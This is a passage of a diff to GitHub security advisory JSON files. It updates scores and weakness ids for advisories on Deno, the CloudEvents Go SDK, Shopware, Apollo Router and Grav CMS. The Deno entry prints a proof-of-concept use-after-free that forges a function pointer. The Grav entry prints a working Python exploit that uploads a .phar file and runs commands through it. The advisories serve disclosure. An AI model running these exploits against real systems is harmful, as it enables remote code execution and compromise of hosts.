bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2\n", - "severity": [], + "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -41,10 +46,12 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T17:04:29Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:22Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json index b817c8d243bea..7a72186d272b4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json +++ b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-5pf6-2qwx-pxm2", - "modified": "2024-03-12T15:22:22Z", + "modified": "2026-02-17T19:40:16Z", "published": "2024-03-06T20:11:59Z", "aliases": [ "CVE-2024-28110" ], "summary": "Go SDK for CloudEvents's use of WithRoundTripper to create a Client leaks credentials", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2\n", - "severity": [], + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [ { "package": { @@ -52,8 +57,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T20:11:59Z", "nvd_published_at": "2024-03-06T22:15:57Z" diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json index 38ea09ccfe953..0d40371e3ebe4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json +++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-c2f9-4jmm-v45m", - "modified": "2024-03-06T15:06:54Z", + "modified": "2026-02-17T22:02:24Z", "published": "2024-03-06T15:06:54Z", "aliases": [ "CVE-2024-27917" ], "summary": "Shopware's session is persistent in Cache for 404 pages", - "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [], + "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -75,9 +80,9 @@ "cwe_ids": [ "CWE-524" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T15:06:54Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-06T20:15:48Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json index 392aeb4725b74..315f3eb069e6a 100644 --- a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json +++ b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-cgqf-3cq5-wvcj", - "modified": "2024-03-06T18:24:17Z", + "modified": "2026-02-17T19:37:19Z", "published": "2024-03-06T18:24:17Z", "aliases": [ "CVE-2024-28101" ], "summary": "Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", - "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. \n", - "severity": [], + "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -48,9 +53,9 @@ "cwe_ids": [ "CWE-409" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T18:24:17Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:23Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json index cedc93372d406..d074f2bee2ed8 100644 --- a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json +++ b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-f6g2-h7qv-3m5v", - "modified": "2024-03-06T16:58:33Z", + "modified": "2026-02-17T19:39:34Z", "published": "2024-03-06T16:58:33Z", "aliases": [ "CVE-2024-27923" ], "summary": "Remote Code Execution by uploading a phar file using frontmatter", - "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n", - "severity": [], + "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def 